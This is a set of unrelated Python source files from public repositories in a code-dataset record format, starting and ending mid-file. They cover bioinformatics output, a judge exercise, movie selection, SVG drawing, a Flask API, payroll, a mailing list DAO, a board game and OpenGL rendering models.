'/hafeZ_prophage_for_' + i + '.png', format = 'png')\n plt.clf()\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_hmm_table(roi_df,output_folder):\n print('\\n{:#^50}'.format(' Outputting hmm hit table '))\n start_time = time.time()\n df = pd.read_csv(output_folder + '/temp_hmms.tab', sep='\\t')\n df = df[df['orf'].str.split('~').str[:-1].str.join('~').isin(list(roi_df['roi']))]\n for index, row in df.iterrows():\n old = '~'.join(row['orf'].split('~')[:-1])\n df.loc[index, 'orf'] = roi_df['roi_new'][roi_df['roi'] == old].iloc[0]\n df.columns = ['vog_no','orf_name','e_value','orf_no','vog_phage_taxonomy','vog_description']\n df = df[['orf_name','orf_no','vog_no','e_value','vog_phage_taxonomy','vog_description']]\n df = df.reset_index(drop=True)\n sort = (df.assign(orf_no2=df['orf_no'].str.extract(r'(\\d+)$').astype(int)).sort_values(['orf_name', 'orf_no2']).index)\n df = df.iloc[sort]\n df.to_csv(output_folder + '/hafeZ_hmm_hits.tsv', sep='\\t', index=False)\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_roi_table(roi_df,output_folder):\n print('\\n{:#^50}'.format(' Outputting roi table '))\n start_time = time.time()\n for index, row in roi_df.iterrows():\n if row['circular'] == False:\n roi_df.loc[index, 'roi_length'] = row['end_pos'] - row['start_pos'] + 1\n elif (row['circular'] == True) & (row['roi'].split('_')[-1] == 'c1'):\n if row['start_pos'] > row['end_pos']:\n len_1 = row['contig_len'] - row['start_pos']\n len_2 = row['end_pos'] - 0\n roi_df.loc[index, 'roi_length'] = len_1 + len_2\n else:\n roi_df.loc[index, 'roi_length'] = row['end_pos'] - row['start_pos'] + 1 \n elif (row['circular'] == True) & (row['roi'].split('_')[-1] == 'c2'):\n if row['start_pos'] > row['end_pos']:\n roi_df.loc[index, 'roi_length'] = row['end_pos'] - row['start_pos'] + 1 \n else:\n len_1 = row['contig_len'] - row['start_pos']\n len_2 = row['end_pos'] - 0\n roi_df.loc[index, 'roi_length'] = len_1 + len_2\n ##### will add these columns in in a later version\n # roi_df = roi_df[['roi_new', 'start_pos', 'start_count', 'end_pos', 'end_count', 'roi_length', 'orf_count','frac_pvog','circular','med_z','attL_seq','attR_seq', 'contig_split','longest_below_z']].copy()\n # roi_df.columns = ['roi', 'start_pos', 'start_count', 'end_pos', 'end_count', 'roi_length', 'orf_count','frac_pvog','circular','med_z','attL_seq','attR_seq', 'contig_split', 'longest_below_z']\n roi_df = roi_df[['roi_new', 'start_pos', 'start_count', 'end_pos', 'end_count', 'roi_length', 'orf_count','frac_pvog','circular','attL_seq','attR_seq']].copy()\n roi_df.columns = ['roi', 'start_pos', 'start_count', 'end_pos', 'end_count', 'roi_length', 'orf_count','frac_pvog','circular','attL_seq','attR_seq']\n for index, row in roi_df.iterrows():\n roi_df.loc[index, 'start_pos'] = row['start_pos'] + 1\n roi_df.loc[index, 'frac_pvog'] = round(row['frac_pvog'],2)\n roi_df.loc[index, 'roi_length'] = int(row['roi_length'])\n roi_df.to_csv(output_folder + '/hafeZ_summary_all_rois.tsv', sep='\\t', index=False)\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef output_no_roi(output_folder):\n roi_df = pd.DataFrame(data = {'roi': [np.nan], 'start_pos': [np.nan], 'end_pos': [np.nan], 'roi_length': [np.nan], 'orf_count': [np.nan], 'frac_pvog': [np.nan], 'circular': [np.nan]})\n roi_df.to_csv(output_folder + '/hafeZ_summary_all_rois.tsv', sep='\\t', index=False)\n print('\\n{:#^50}'.format(''))\n print('{:#^50}'.format(' NO ACTIVE PROPHAGE FOUND '))\n print('{:#^50}'.format(' exiting and outputing empty .tsv '))\n print('{:#^50}'.format(''))\n\n\ndef output_contig_Z(depths,output_folder,median,mad):\n print('\\n{:#^50}'.format(' Making figures of contig Z-scores'))\n start_time = time.time()\n matplotlib.use('Agg')\n for i in depths:\n z = [((0.6745*(x - median))/mad) for x in depths[i]]\n fig = plt.gcf()\n fig.set_size_inches(18.5, 10.5)\n plt.plot(z)\n pos = 4\n plt.savefig(output_folder + '/zscores_for_contig' + i + '.png', format = 'png')\n plt.clf()\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\ndef clean_up(output_folder):\n print('\\n{:#^50}'.format(' Doing final tidy '))\n start_time = time.time()\n for f in glob.glob(output_folder + '/temp*'):\n os.remove(f)\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))\n\n\ndef output_hmm_table_phrogs(roi_df,output_folder,db_path):\n print('\\n{:#^50}'.format(' Outputting hmm hit table '))\n start_time = time.time()\n df = pd.read_csv(output_folder + '/temp_hmms.tab', sep='\\t', names = ['orf','vog_no','e_value','orf_no']) \n df = df[df['orf'].str.split('~').str[:-1].str.join('~').isin(list(roi_df['roi']))]\n phrogs_db = pd.read_csv(db_path + '/phrogs_table_almostfinal_plusGO_wNA_utf8.tsv', sep='\\t', usecols = [0,6], names=['phrog','category'])\n phrogs_db['phrog'] = 'phrog_' + phrogs_db['phrog'].astype(str)\n for index, row in df.iterrows():\n old = '~'.join(row['orf'].split('~')[:-1])\n df.loc[index, 'orf'] = roi_df['roi_new'][roi_df['roi'] == old].iloc[0]\n if row['e_value'] > 0.00001:\n df.loc[index, 'vog_no'] = np.nan \n df.loc[index, 'e_value'] = np.nan\n df.loc[index, 'number'] = int(row['orf_no'].split('_')[-1])\n df.loc[index,'vog_description'] = phrogs_db['category'][phrogs_db['phrog'] == row['vog_no']].iloc[0]\n df.columns = ['roi','vog_no','e_value','orf_no','number','vog_description']\n df = df.sort_values(by=['roi','number'])\n df = df[['roi','orf_no','vog_no','e_value','vog_description']]\n df = df.reset_index(drop=True)\n df.to_csv(output_folder + '/hafeZ_hmm_hits.tsv', sep='\\t', index=False)\n end_time = '{:.3f}'.format(time.time() - start_time)\n print('{:#^50}'.format(' Done: ' + end_time + ' seconds '))","repo_name":"Chrisjrt/hafeZ","sub_path":"hZ/get_output.py","file_name":"get_output.py","file_ext":"py","file_size_in_byte":10278,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"41272359483","text":"__author__ = 'joaquim'\n\"\"\"\nURI Online Judge | 1174\nSeleçao em Vetor I\n\nAdaptado por Neilor Tonin, URI Brasil\nTimelimit: 1\n\nFaça um programa que leia um vetor A[100]. No final, mostre todas as posições do vetor que armazenam um valor menor ou\nigual a 10 e o valor armazenado em cada uma das posições.\nEntrada\n\nA entrada contém 100 valores, podendo ser inteiros, reais, positivos ou negativos.\nSaída\n\nPara cada valor do vetor menor ou igual a 10, escreva \"A[i] = x\", onde i é a posição do vetor e x é o valor armazenado\nna posição, com uma casa após o ponto decimal.\nExemplo de Entrada \tExemplo de Saída\n\n0\n-5\n63\n-8.5\n...\n\nA[0] = 0.0\nA[1] = -5.0\nA[3] = -8.5\n...\n\"\"\"\na = [float(i) for i in range(100)]\n\nfor i in range(100):\n num = float(input())\n a[i] = num\n\nfor j in range(len(a)):\n if a[j] <= 10.0:\n print(\"A[%d] = %.1f\" %(j,a[j]))","repo_name":"jaf88/My-URI-Judge","sub_path":"1174.py","file_name":"1174.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1118632644","text":"from heapq import nlargest, heappush, heappop\nfrom typing import List\nfrom dataclasses import dataclass, field\nfrom bisect import bisect_left\n\n@dataclass(order=True)\nclass Movie:\n movie_id: int=field(compare=False)\n movie_length: int=field(compare=False)\n movie_name: str=field(compare=False)\n movie_weight: float\n\ndef index(a, x):\n 'Locate the leftmost value exactly equal to x'\n i = bisect_left(a, x)\n if i != len(a) and a[i] == x:\n return i\n raise ValueError\n\ndef get_maximized_pleasure(time_have: int, movies_origin: List[Movie]) -> List[Movie]:\n movies = movies_origin\n n = len(movies)\n curr = 0\n movies.sort(key=lambda x:x.movie_length)\n res = []\n \n pq = []\n time_spend = 0\n while True:\n while curr < n and movies[curr].movie_length <= time_have-time_spend:\n heappush(pq, movies[curr])\n curr += 1\n\n if pq:\n temp_movie = heappop(pq)\n res.append(temp_movie)\n time_spend += temp_movie.movie_length\n else:\n break\n\n movies.remove(temp_movie)\n pq.clear()\n curr = 0\n n=len(movies)\n \n return res\n\n\ndef pick_movies_by_time(time_have:int, movies:list[dict]) -> list[dict]:\n movies_input = []\n movies_map = {}\n for m in movies:\n # index, movie_runtime, movie_name, movie_rating*movie_likability\n movies_input.append(Movie(m['id'], m['runtime'], m['name'], -m['rating']*m['likability']))\n movies_map[m['id']] = m\n pick_output = get_maximized_pleasure(time_have, movies_input)\n res = []\n for m in pick_output:\n res.append(movies_map[m.movie_id])\n\n return res\n\ndef get_maximized_nums(num: int, movies_origin: List[Movie]) -> List[Movie]:\n movies = movies_origin\n movies.sort(key=lambda x:x.movie_weight)\n \n return movies[:num]\n\ndef pick_movies_by_num(num:int, movies:List[dict]) -> List[dict]:\n movies_input = []\n movies_map = {}\n for m in movies:\n # index, movie_runtime, movie_name, movie_rating*movie_likability\n movies_input.append(Movie(m['id'], m['runtime'], m['name'], -m['rating']*m['likability']))\n movies_map[m['id']] = m\n pick_output = get_maximized_nums(num, movies_input)\n res = []\n for m in pick_output:\n res.append(movies_map[m.movie_id])\n\n return res","repo_name":"youzeFix/happymovie","sub_path":"server/server/pick_algo.py","file_name":"pick_algo.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28499497049","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[287]:\n\n\nfrom IPython.display import display, SVG\nimport svgwrite\n\nclass Draw:\n def __init__(self, file, width=600, height=200, marginX=10, marginY=10):\n \n self.file = file\n \n self.width = width\n self.height = height\n self.marginX = marginX\n self.offSetX = marginX//2\n self.marginY = marginY\n self.offSetY = marginY//2\n self.boundingBox = ((self.offSetX, self.offSetY), (width-marginX, height-marginY))\n \n self.drawObj = svgwrite.Drawing(filename=file, height='{}px'.format(height), width='{}px'.format(width))\n self.drawObj.viewbox(0, 0, self.width, self.height)\n self.mainBox = self.drawObj.add(self.drawObj.g(id='mainBox'))\n \n self.PATTERNS_COLORS = ['green', 'blue', 'red', 'pink', 'gray', 'brown', \n 'orange', 'yellow', 'black', 'white', 'purple', 'cyan']\n self.added_patterns = []\n self.boxes = []\n \n def show(self):\n self.drawObj.save()\n display(SVG(filename=self.file))\n\n def listPatterns(self):\n return ' '.join([' '.join([c+'|', c+'-', c+'\\\\', c+'/']) for c in self.PATTERNS_COLORS]).split()\n \n def fillPattern(self, name):\n if not name in self.listPatterns():\n raise Exception('Options are: ' + ', '.join(self.listPatterns()))\n \n name = name.replace('\\\\', '@')\n if not name in self.added_patterns:\n c = name[:-1]\n o = name[-1]\n s = (3, 3) if (o in ['-', '|']) else (100, 100)\n pattern = self.drawObj.pattern(size=s, id='pattern-%s' % name, patternUnits=\"userSpaceOnUse\")\n \n if (o in ['-', '|']):\n tLine = ((0, 2), (3, 2)) if o == '-' else ((2, 3), (2, 0))\n pattern.add(self.drawObj.line(start=tLine[0], end=tLine[1], stroke=c, stroke_width=0.5))\n else:\n a = 100 if o == '/' else 0\n b = 0 if o == '/' else 100\n for i in range(-100, 200, 4):\n pattern.add(self.drawObj.line(start=(i, a), end=(i+100, b), stroke=c, stroke_width=0.5))\n \n self.drawObj.defs.add(pattern)\n self.added_patterns.append(name)\n return \"url(#pattern-%s)\" % name\n \n def box(self, name=None):\n name = ('box%s' % len(self.boxes)) if name is None else name\n return self.drawObj.add(self.drawObj.g(id=name))\n \n def square(self, x, y, w, h, c, box=None):\n box = self.mainBox if box is None else box\n box.add(self.drawObj.rect(insert=(x, y), size=(w, h), fill=c))\n \n def text(self, text, x, y, box=None, italic=False, family='Times', size=12, bold=False):\n box = self.mainBox if box is None else box\n self.mainBox.add(self.drawObj.text(\n text, insert=(x, y), \n font_style=\"italic\" if italic else 'normal', \n font_family=family, \n font_size=size, \n font_weight= 'bold' if bold else 'normal'))\n \n def star(self, x, y, box=None, fill=\"gray\", stroke=\"white\", r=5):\n box = self.mainBox if box is None else box\n STAR8 = \"0 8 L 8 12 L 7 2 L 14 -4 L 4 -6 L 0 -15 L -4 -6 L -14 -4 L -7 2 L -8 12 L 0 8\"\n STAR5 = \"0 5 L 5 8 L 4 1 L 9 -3 L 2 -4 L 0 -10 L -2 -4 L -9 -3 L -4 1 L -5 8 L 0 5\"\n STAR = STAR8 if r == 8 else STAR5\n d = 'M ' + ' L '.join([str(int(p.split()[0])+x) + ' ' + str(int(p.split()[1])+y) for p in STAR.split(\" L \")]) + ' z'\n box.add(self.drawObj.path(d=d, fill=fill, stroke=stroke))\n\n def seta(self, x1, x2, y, box=None, color='black', h=20, start=False, pS=4):\n box = self.mainBox if box is None else box\n box.add(self.drawObj.path(d='M {0} {1} C {0} {2} {3} {2} {3} {1}'.format(x1, y, y+h, x2), \n fill=\"none\", stroke=color, stroke_width=pS//2))\n xs = x1 if start else x2\n box.add(self.drawObj.path(\n d='M {0} {1} L {2} {1} L {3} {4} z'.format(xs-pS, y, xs+pS, xs, y-pS), stroke=color, fill=color))\n\n\n\n# In[291]:\n\n\ndraw = Draw('test.svg')\ndraw.square(30, 30, 100, 150, draw.fillPattern('red\\\\'))\ndraw.square(30, 30, 100, 150, draw.fillPattern('green/'))\n#draw.square(30, 30, 100, 150, draw.fillPattern('blue|'))\n#draw.square(30, 30, 100, 150, draw.fillPattern('black-'))\ndraw.text('Miquéias', 30, 90)\ndraw.star(80, 90)\ndraw.seta(30, 80, 100)\ndraw.show()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"MiqueiasFernandes/bioinformatics","sub_path":"drawSVG.py","file_name":"drawSVG.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"73754093633","text":"import random\nimport string\n\nfrom flask import Flask, request\nfrom flask_restful import reqparse, abort, Api, Resource\n\napp = Flask(__name__)\n\napi = Api(app)\n\nPersons_dict = {\n \"1\": {'name': 'Aravind', 'domain': 'Web App'},\n \"2\": {'name': 'Sandeep', 'domain': 'ML+DevOps'},\n \"3\": {'name': 'Karthik', 'domain': 'Arduino'},\n}\n\nparser = reqparse.RequestParser()\nparser.add_argument('name')\nparser.add_argument('domain')\n\n# 404 -> Not found\n\n\ndef abort_if_person_doesnt_exist(id):\n if id not in Persons_dict:\n abort(404, message=\"Person {} doesn't exist\".format(id))\n\n\ndef abort_if_person_exists(id):\n if id in Persons_dict:\n abort(404, message=\"Person {} already exists\".format(id))\n\n\nclass Persons(Resource):\n def get(self):\n return Persons_dict\n\n def post(self):\n print(request.json)\n print(request.get_json(force=True))\n args = parser.parse_args()\n print(args)\n id = str(len(Persons_dict) + 1)\n abort_if_person_exists(id)\n Persons_dict[id] = args\n # 201 -> created\n return {'id': id}, 201\n\n\nclass Person(Resource):\n def get(self, id):\n # print(type(id))\n # print(Persons_dict)\n abort_if_person_doesnt_exist(id)\n return {id: Persons_dict[id]}\n\n\napi.add_resource(Persons, '/persons')\napi.add_resource(Person, '/person/')\n\n\n@app.route('/')\ndef index():\n return 'OK!'\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Aravind-Kannan/kidzafe","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72410645315","text":"#Gordonedjhill\r\n#Wages calculation\r\n\r\ndef payroll(sal):\r\n k=0\r\n payroll = 0\r\n while k <= 9:\r\n payroll = payroll + sal\r\n k = k + 1\r\n return payroll\r\n\r\ndef main():\r\n file = \"namesWages.txt\"\r\n file2 = \"payroll.txt\"\r\n outfile = open(file2, 'w') \r\n with open(file, 'r') as f:\r\n for line in f:\r\n first = line.split()\r\n uname = (first[1])\r\n uname2 = (first[0])\r\n print()\r\n wage = (first[2])\r\n wage = eval(wage)\r\n hour = (first[3])\r\n hour = eval(hour)\r\n sal = hour * wage\r\n payrol = payroll(sal)\r\n print(uname,\"\",uname2,\"$\",sal, file = outfile)\r\n \r\n \r\n \r\n print (\"The payroll for the week is $\",payrol,file = outfile)\r\n \r\nmain() \r\n","repo_name":"gordonedjhill/Introduction-to-the-great-language-python1","sub_path":"wagetxt.py","file_name":"wagetxt.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74995491073","text":"\nimport datetime\nfrom api import db\nfrom api.models import Mailinglist, BaseDAO\n\n\nclass MailingListDAO(BaseDAO):\n \"\"\"\n operations against the MailingList table\n \"\"\"\n table = Mailinglist\n\n @classmethod\n def create(cls, name, email, message):\n subscriber = cls.table.create_new(name=name, email=email, message=message, subscribed=True)\n db.session.add(subscriber)\n db.session.commit()\n return subscriber\n\n @classmethod\n def get(cls, mailinglist_id):\n return Mailinglist.query.get(mailinglist_id)\n\n @classmethod\n def get_by_email(cls, email):\n return cls.table.query.filter(cls.table.email == email).all()\n\n @classmethod\n def list(cls, num_days=None):\n if num_days is None:\n return [subscriber.to_dict() for subscriber in cls.table.query.all()]\n else:\n start_date = datetime.datetime.utcnow() - datetime.timedelta(days=num_days)\n return [subscriber.to_dict() for subscriber in cls.table.query.filter(cls.table.created > start_date).all()]\n\n @classmethod\n def subscribe(cls, name, email, message):\n \"\"\" Create a new subscriber if one doesn't exist or re-subscribe an email if it already exists. \"\"\"\n subscriber = cls.table.query.filter(cls.table.email == email).first()\n if subscriber is None:\n return cls.create(name, email, message)\n else:\n subscriber.subscribed = True\n db.session.commit()\n return subscriber\n\n @classmethod\n def unsubscribe(cls, email):\n \"\"\" Find any and all instances of an email in the mailing list and unsubscribe it. \"\"\"\n emails = cls.table.query.filter(cls.table.email == email).all()\n for email in emails:\n email.subscribed = False\n db.session.commit()\n","repo_name":"Everyday-Future/cookiecutter-devops","sub_path":"{{cookiecutter.project_slug}}/api/daos/mailinglist.py","file_name":"mailinglist.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"70986671555","text":"from src.services.game import Game\n\ngame = Game()\n\nnum_of_players = 2\nfor i in range(num_of_players):\n name = input(\"Enter player's name:\")\n game.add_player(name)\n\ngame.add_board(100)\ngame.add_dice(6)\n\nsnakes_and_ladders = {\n\t(99, 10), (8, 35), (40, 22), (91, 45), (46, 83),\n\t(88, 32), (66, 94), (54, 86), (44, 3), (74, 62),\n\t(1, 9), (8, 4), (2, 11), (12, 3)\t\n}\nfor item in snakes_and_ladders:\n\tgame.add_side_effect(*item)\ngame.play()\n","repo_name":"anuj-kumar/snakeladder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36003488770","text":"from abc import abstractmethod\n\nimport dataclasses\nfrom OpenGL.GL import *\nfrom dataclasses import dataclass, field\n\nfrom viz3d.opengl.gl_algebra import *\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model Data\n@dataclass\nclass ModelData:\n \"\"\"An abstract class for ModelData which reunite all variables needed to define a specific model\"\"\"\n default_color: Optional[np.ndarray] = None # The default color of the model\n instance_model_to_world: Optional[np.ndarray] = None # The Optional transformation matrix from instance to world\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model\nclass Model:\n \"\"\"\n A Model contains all the information to be drawn by the engine\n The Geometric Data (Mesh, Points, Lines),\n And the textures\n \"\"\"\n\n def __init__(self, model_data: Optional[ModelData] = None):\n self.model_data = model_data\n self.vao = None\n self.instance_pose_bo = None\n\n self._last_num_instances = 0\n\n # ------------------------------------------------------------------------------------------------------------------\n @property\n def model_data(self):\n \"\"\"Returns the model data saved for this model\"\"\"\n return self._model_data\n\n @model_data.setter\n def model_data(self, _model_data: Optional[ModelData]):\n valid_model_data = self.verify_model_data(_model_data)\n if valid_model_data is not None:\n if valid_model_data.instance_model_to_world is None:\n valid_model_data.instance_model_to_world = np.eye(4, dtype=np.float32).reshape(1, 4, 4)\n check_sizes(valid_model_data.instance_model_to_world, [-1, 4, 4])\n self._model_data = valid_model_data\n\n def num_instances(self):\n \"\"\"\n Returns the number of instances of the current model\n\n More precisely, returns the number of instances corresponding to the last\n Model Data sent to the device via `update_model`\n \"\"\"\n return self._last_num_instances\n\n # ------------------------------------------------------------------------------------------------------------------\n @abstractmethod\n def init_buffers(self):\n \"\"\"\n Initializes\n \"\"\"\n self.vao = glGenVertexArrays(1)\n self.instance_pose_bo = glGenBuffers(1)\n\n @abstractmethod\n def verify_model_data(self, model_data: Optional[ModelData]):\n \"\"\"\n Verifies that `model_data` is valid for this instance,\n or that a valid ModelData can be built from it\n\n Returns a valid ModelData\n \"\"\"\n assert_debug(model_data is not None)\n return model_data\n\n @abstractmethod\n def init_model(self):\n \"\"\"\n Allocates buffers (VBO, EBO, and VAO) on the GPU,\n And defines the layout of the Data (with VAO's vertex attributes)\n \"\"\"\n # Draw specific Data\n raise NotImplementedError(\"\")\n\n @abstractmethod\n def update_model(self):\n \"\"\"\n Updates the model buffers when its state has changed\n \"\"\"\n # Bind the VAO for the data of the model\n glBindVertexArray(self.vao)\n\n # Send instance object poses to the GPU\n glBindBuffer(GL_ARRAY_BUFFER, self.instance_pose_bo)\n glBufferData(GL_ARRAY_BUFFER, self.model_data.instance_model_to_world.nbytes,\n\n # Need to transpose the array to build the matrix4d consistent with OpenGL layout\n self.model_data.instance_model_to_world.transpose((0, 2, 1)),\n GL_STATIC_DRAW)\n\n # Set the location of\n float_size = type_size(np.float32)\n vec4_size = 4 * float_size\n for i in range(4):\n location = self.instance_pose_location() + i\n glEnableVertexAttribArray(location)\n glVertexAttribPointer(location,\n 4,\n GL_FLOAT,\n GL_FALSE,\n vec4_size * 4,\n ctypes.c_void_p(vec4_size * i))\n glVertexAttribDivisor(location, 1)\n\n glBindVertexArray(0)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n # Sets the following variables corresponding to the last updated pointcloud\n self._last_num_instances = self.model_data.instance_model_to_world.shape[0]\n\n # ------------------------------------------------------------------------------------------------------------------\n @staticmethod\n def points_location():\n return 0\n\n @staticmethod\n def color_location():\n return 1\n\n @staticmethod\n def instance_pose_location():\n return 3\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# PointCloudModel\n@dataclass\nclass PointCloudModelData(ModelData):\n \"\"\"PointCloudModelData\"\"\"\n xyz: np.ndarray = field(default=np.zeros((1, 3), dtype=np.float32)) # The xyz pointcloud coordinates\n color: Optional[np.ndarray] = None # The color of the pointcloud\n point_size: float = 1.0 # The size of points for rendering\n\n\nclass PointCloudModel(Model):\n \"\"\"A Model To render simple colored PointClouds\"\"\"\n\n def __init__(self,\n model_data: PointCloudModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n check_sizes(self.model_data.instance_model_to_world, [-1, 4, 4])\n self.vertex_bo = None\n self.color_bo = None\n self.instance_pose_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n # ---------------------------------------------------------\n # Variables of points and instances saved in OpenGL buffers\n self._last_num_points = 0\n\n def num_points(self):\n return self._last_num_points\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n\n data = np.concatenate([self.model_data.xyz, self.model_data.color], axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n self._last_num_points = self.model_data.xyz.shape[0]\n\n def delete(self):\n glDeleteVertexArrays(1, int(self.vao))\n glDeleteBuffers(1, int(self.vertex_bo))\n glDeleteBuffers(1, int(self.instance_pose_bo))\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert_debug(_model_data is not None)\n check_sizes(_model_data.xyz, [-1, 3])\n if _model_data.xyz.dtype != np.float32:\n _model_data = dataclasses.replace(_model_data, xyz=_model_data.xyz.astype(np.float32))\n\n if _model_data.color is None:\n default_color = _model_data.default_color\n if default_color is None:\n default_color = farray([[0.0, 0.63, 1.0]])\n\n color = default_color.repeat(_model_data.xyz.shape[0], axis=0)\n _model_data = dataclasses.replace(_model_data, color=color)\n\n check_sizes(_model_data.color, [_model_data.xyz.shape[0], 3])\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# CAMERASMODEL\n\n@dataclass\nclass CamerasModelData(ModelData):\n \"\"\"CamerasModelData\"\"\"\n camera_size: float = 1.0 # The scale factor of the camera model\n width: float = 2 # Width of the line defining the camera model\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass CamerasModel(Model):\n \"\"\"A Model to render a set of cameras displayed as a simple edge pyramid\"\"\"\n\n __vertex_data = farray([\n 0.0, 0.0, -2.0,\n 1.0, 0.6, 0.0,\n 1.0, -0.6, 0.0,\n -1.0, -0.6, 0.0,\n -1.0, 0.6, 0.0,\n ]).reshape(-1, 3)\n\n __edge_indices = idarray([\n 0, 1,\n 0, 2,\n 0, 3,\n 0, 4,\n 1, 2,\n 2, 3,\n 3, 4,\n 4, 1\n ])\n\n def __init__(self,\n model_data: CamerasModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n def num_elements(self):\n return self.__edge_indices.shape[0]\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.concatenate([self.model_data.camera_size * self.__vertex_data,\n self.model_data.default_color.repeat(self.__vertex_data.shape[0], axis=0)],\n axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, self.__edge_indices.nbytes, self.__edge_indices, GL_STATIC_DRAW)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert_debug(_model_data is not None and isinstance(_model_data, CamerasModelData))\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.zeros((1, 3), dtype=np.float32))\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n@dataclass\nclass PosesModelData(ModelData):\n \"\"\"PosesModelData\"\"\"\n scale: float = 1.0 # The scale factor of the camera model\n width: float = 2 # Width of the line defining the camera model\n\n\nclass PosesModel(Model):\n \"\"\"A Model to render of camera poses (using the robotics convention)\"\"\"\n\n __vertex_data = farray([\n 0.0, 0.0, 0.0, 1.0, 0.0, 0.0,\n 1., 0.0, 0.0, 1.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.0, 0.0,\n 0., 1.0, 0.0, 0.0, 1.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.6, 1.0,\n 0., 0.0, 1.0, 0.0, 0.6, 1.0\n ]).reshape(-1, 6)\n\n __edge_indices = idarray([\n 0, 1,\n 2, 3,\n 4, 